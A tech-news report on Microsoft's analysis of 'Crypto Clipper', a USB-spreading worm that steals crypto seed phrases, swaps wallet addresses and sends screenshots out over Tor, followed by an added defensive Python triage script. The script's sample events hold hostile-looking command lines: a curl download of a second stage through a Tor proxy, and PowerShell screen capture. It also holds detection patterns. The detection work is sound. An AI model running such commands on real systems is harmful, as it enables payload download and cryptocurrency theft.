Microsoft warns of self-spreading malware that steals cryptocurrency
Crypto Clipper takes five screenshots over 10 seconds

Jun 19, 2026
10:55 am

What's the story

Microsoft has discovered a new strain of self-propagating malware, dubbed "Crypto Clipper." The worm spreads through USB drives and targets cryptocurrency credentials. Once it gets hold of the information, Crypto Clipper sends it to servers controlled by attackers. The software also takes five screenshots over a 10-second period and sends both the credentials and images via Tor, an anonymous routing network protocol.

Malware mechanics

Crypto Clipper gets its name from how it monitors the clipboard

Crypto Clipper gets its name from the way it monitors clipboard contents for wallet addresses or seed phrases. When it finds such patterns, the malware downloads itself through a SOCKS5 proxy, a network protocol that relays traffic through a proxy server to its final destination. Crypto Clipper establishes its Tor connection by the same method, which makes detection and removal even more difficult.

Infection strategy

Crypto Clipper spreading via .lnk files on USB drives

Microsoft observed Crypto Clipper spreading via .lnk files on USB drives. These files carry executable code that, when an infected USB drive is plugged in, checks whether the malware is already installed on the device; if not, it downloads itself through the Tor proxy. To hide traces of the worm, it scans the infected USB drive and renames the .lnk files.


Information theft

Malware replaces found addresses with attacker-controlled wallets

Crypto Clipper not only monitors clipboard contents for standardized 12- or 24-word seed phrases but also uploads them, along with screenshots, to the attacker's server. It even replaces wallet addresses it finds with addresses belonging to attacker-controlled wallets, diverting payments to the attackers. Microsoft believes the purpose of the screenshots is to provide context that may be useful to the attackers.


Security measures

How to detect Crypto Clipper on your device

Microsoft Defender for Endpoint detects Crypto Clipper components under the alerts "Suspicious JavaScript processes" and "Possible data exfiltrations using Curl". Meanwhile, Microsoft Defender Antivirus flags it as Trojan: Win32/CryptoBandits.A. More generally, the strongest signs of infection are script interpreters spawning suspicious child processes, proxy usage on localhost:9050, screen-capture commands in PowerShell, and signs of clipboard inspection or crypto-address replacement.
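The infection signs listed above, turned into a small process-event triage script as an added example (it is not code from Microsoft's write-up or from this article). It runs over constructed sample events; the Sysmon-like field names, the script-interpreter and child-process lists, and the CopyFromScreen pattern used for PowerShell screen capture are assumptions.

```python
import os
import re

# Constructed sample process-creation events (not real telemetry); the field
# names loosely follow a Sysmon Event ID 1 record and are an assumption.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe //E:JScript E:\update.js"},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe --socks5-hostname localhost:9050 http://placeholder.invalid/stage2"},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -c Add-Type -AssemblyName System.Drawing; [Drawing.Graphics]::CopyFromScreen"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Git\mingw64\bin\curl.exe",
     "cmdline": "curl.exe -O https://placeholder.invalid/index.html"},
]

# Script interpreters that should rarely spawn network or shell tooling on a workstation (assumed list).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "node.exe", "powershell.exe"}
SUSPICIOUS_CHILDREN = {"curl.exe", "powershell.exe", "cmd.exe", "bitsadmin.exe"}
# localhost:9050 is the default Tor SOCKS port; socks5h:// is curl's proxy URL scheme.
PROXY_RE = re.compile(r"(?:localhost|127\.0\.0\.1):9050\b|--socks5(?:-hostname)?\b|socks5h?://", re.I)
# .NET screen-capture API commonly driven from PowerShell (an assumption, not from the article).
CAPTURE_RE = re.compile(r"CopyFromScreen|System\.Drawing\.Bitmap", re.I)

def basename(path):
    """Lower-case file name of a Windows path, regardless of the host OS."""
    return os.path.basename(path.replace("\\", "/")).lower()

def evaluate(event):
    """Return the names of the Crypto Clipper indicators a single event matches."""
    hits = []
    parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    if parent in SCRIPT_HOSTS and image in SUSPICIOUS_CHILDREN:
        hits.append("script-host-spawns-tool")
    if PROXY_RE.search(cmd):
        hits.append("tor-socks-proxy")
    if image == "powershell.exe" and CAPTURE_RE.search(cmd):
        hits.append("powershell-screen-capture")
    return hits

def scan(events):
    """Map each event index to its indicator list; events with no hits are omitted."""
    return {i: hits for i, e in enumerate(events) if (hits := evaluate(e))}

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["cmdline"], "->", ", ".join(hits))
```

Events 1 and 2 (the curl-over-Tor fetch and the PowerShell capture, both spawned by wscript.exe) trigger two indicators each; the benign explorer-spawned events trigger none, which is the separation a hunting query on real telemetry should aim for.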
